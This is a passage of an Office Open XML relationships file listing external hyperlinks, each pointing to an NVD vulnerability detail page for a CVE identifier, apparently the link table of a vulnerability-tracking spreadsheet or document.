Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73307" TargetMode="External" Id="rId5442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78624" TargetMode="External" Id="rId5443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84901" TargetMode="External" Id="rId5444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88279" TargetMode="External" Id="rId5445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88280" TargetMode="External" Id="rId5446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88281" TargetMode="External" Id="rId5447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88283" TargetMode="External" Id="rId5448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88284" TargetMode="External" Id="rId5449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-48006" TargetMode="External" Id="rId5450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15614" TargetMode="External" Id="rId5451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-3271" TargetMode="External" Id="rId5452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0304" TargetMode="External" Id="rId5453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18986" TargetMode="External" Id="rId5454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19862" TargetMode="External" Id="rId5455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21086" TargetMode="External" Id="rId5456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21090" TargetMode="External" Id="rId5457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21091" TargetMode="External" Id="rId5458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21113" TargetMode="External" Id="rId5459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40175" TargetMode="External" Id="rId5460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45572" TargetMode="External" Id="rId5461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49309" TargetMode="External" Id="rId5462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53529" TargetMode="External" Id="rId5463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53573" TargetMode="External" Id="rId5464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54706" TargetMode="External" Id="rId5465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55165" TargetMode="External" Id="rId5466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63220" TargetMode="External" Id="rId5467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67612" TargetMode="External" Id="rId5468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67617" TargetMode="External" Id="rId5469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69474" TargetMode="External" Id="rId5470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69615" TargetMode="External" Id="rId5471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70589" TargetMode="External" Id="rId5472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70590" TargetMode="External" Id="rId5473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71318" TargetMode="External" Id="rId5474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71325" TargetMode="External" Id="rId5475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71850" TargetMode="External" Id="rId5476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71852" TargetMode="External" Id="rId5477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71870" TargetMode="External" Id="rId5478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72727" TargetMode="External" Id="rId5479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75904" TargetMode="External" Id="rId5480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76652" TargetMode="External" Id="rId5481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77506" TargetMode="External" Id="rId5482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78560" TargetMode="External" Id="rId5483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79943" TargetMode="External" Id="rId5484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80437" TargetMode="External" Id="rId5485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80439" TargetMode="External" Id="rId5486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80440" TargetMode="External" Id="rId5487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81167" TargetMode="External" Id="rId5488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84188" TargetMode="External" Id="rId5489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84310" TargetMode="External" Id="rId5490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84311" TargetMode="External" Id="rId5491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85541" TargetMode="External" Id="rId5492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86257" TargetMode="External" Id="rId5493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86423" TargetMode="External" Id="rId5494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86425" TargetMode="External" Id="rId5495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86813" TargetMode="External" Id="rId5496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87463" TargetMode="External" Id="rId5497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87597" TargetMode="External" Id="rId5498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88038" TargetMode="External" Id="rId5499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18567" TargetMode="External" Id="rId5500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19861" TargetMode="External" Id="rId5501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3096" TargetMode="External" Id="rId5502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53636" TargetMode="External" Id="rId5503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56136" TargetMode="External" Id="rId5504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62845" TargetMode="External" Id="rId5505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64373" TargetMode="External" Id="rId5506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68849" TargetMode="External" Id="rId5507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68891" TargetMode="External" Id="rId5508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69316" TargetMode="External" Id="rId5509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69425" TargetMode="External" Id="rId5510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69483" TargetMode="External" Id="rId5511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69771" TargetMode="External" Id="rId5512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69792" TargetMode="External" Id="rId5513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69853" TargetMode="External" Id="rId5514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69895" TargetMode="External" Id="rId5515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71497" TargetMode="External" Id="rId5516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72931" TargetMode="External" Id="rId5517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73490" TargetMode="External" Id="rId5518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80171" TargetMode="External" Id="rId5519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80176" TargetMode="External" Id="rId5520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81741" TargetMode="External" Id="rId5521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87555" TargetMode="External" Id="rId5522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87602" TargetMode="External" Id="rId5523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14337" TargetMode="External" Id="rId5524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18741" TargetMode="External" Id="rId5525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21097" TargetMode="External" Id="rId5526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44401" TargetMode="External" Id="rId5527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45119" TargetMode="External" Id="rId5528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45129" TargetMode="External" Id="rId5529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49836" TargetMode="External" Id="rId5530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53468" TargetMode="External" Id="rId5531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61607" TargetMode="External" Id="rId5532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67673" TargetMode="External" Id="rId5533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69381" TargetMode="External" Id="rId5534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69548" TargetMode="External" Id="rId5535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73075" TargetMode="External" Id="rId5536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76959" TargetMode="External" Id="rId5537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77353" TargetMode="External" Id="rId5538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78452" TargetMode="External" Id="rId5539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78508" TargetMode="External" Id="rId5540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86484" TargetMode="External" Id="rId5541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86776" TargetMode="External" Id="rId5542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9852" TargetMode="External" Id="rId5543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0296" TargetMode="External" Id="rId5544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-5278" TargetMode="External" Id="rId5545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0001" TargetMode="External" Id="rId5546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18073" TargetMode="External" Id="rId5547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18477" TargetMode="External" Id="rId5548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18508" TargetMode="External" Id="rId5549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20513" TargetMode="External" Id="rId5550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20514" TargetMode="External" Id="rId5551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20518" TargetMode="External" Id="rId5552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45767" TargetMode="External" Id="rId5553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47234" TargetMode="External" Id="rId5554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49509" TargetMode="External" Id="rId5555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49830" TargetMode="External" Id="rId5556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54179" TargetMode="External" Id="rId5557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61790" TargetMode="External" Id="rId5558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69713" TargetMode="External" Id="rId5559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72980" TargetMode="External" Id="rId5560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75059" TargetMode="External" Id="rId5561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75526" TargetMode="External" Id="rId5562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77643" TargetMode="External" Id="rId5563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78486" TargetMode="External" Id="rId5564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79731" TargetMode="External" Id="rId5565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79735" TargetMode="External" Id="rId5566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80055" TargetMode="External" Id="rId5567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81049" TargetMode="External" Id="rId5568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88914" TargetMode="External" Id="rId5569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2018-10624" TargetMode="External" Id="rId5570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-12145" TargetMode="External" Id="rId5571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-2786" TargetMode="External" Id="rId5572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-2842" TargetMode="External" Id="rId5573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0305" TargetMode="External" Id="rId5574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11737" TargetMode="External" Id="rId5575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11738" TargetMode="External" Id="rId5576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11838" TargetMode="External" Id="rId5577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13159" TargetMode="External" Id="rId5578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14466" TargetMode="External" Id="rId5579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14566" TargetMode="External" Id="rId5580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14892" TargetMode="External" Id="rId5581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15398" TargetMode="External" Id="rId5582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15550" TargetMode="External" Id="rId5583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15823" TargetMode="External" Id="rId5584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16941" TargetMode="External" Id="rId5585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18313" TargetMode="External" Id="rId5586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18594" TargetMode="External" Id="rId5587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19043" TargetMode="External" Id="rId5588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19081" TargetMode="External" Id="rId5589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19182" TargetMode="External" Id="rId5590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19802" TargetMode="External" Id="rId5591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19946" TargetMode="External" Id="rId5592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28627" TargetMode="External" Id="rId5593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33047" TargetMode="External" Id="rId5594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41262" TargetMode="External" Id="rId5595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42806" TargetMode="External" Id="rId5596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45121" TargetMode="External" Id="rId5597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45122" TargetMode="External" Id="rId5598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45123" TargetMode="External" Id="rId5599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45124" TargetMode="External" Id="rId5600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45527" TargetMode="External" Id="rId5601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47232" TargetMode="External" Id="rId5602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47245" TargetMode="External" Id="rId5603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50198" TargetMode="External" Id="rId5604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50199" TargetMode="External" Id="rId5605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52730" TargetMode="External" Id="rId5606" /><Relationship 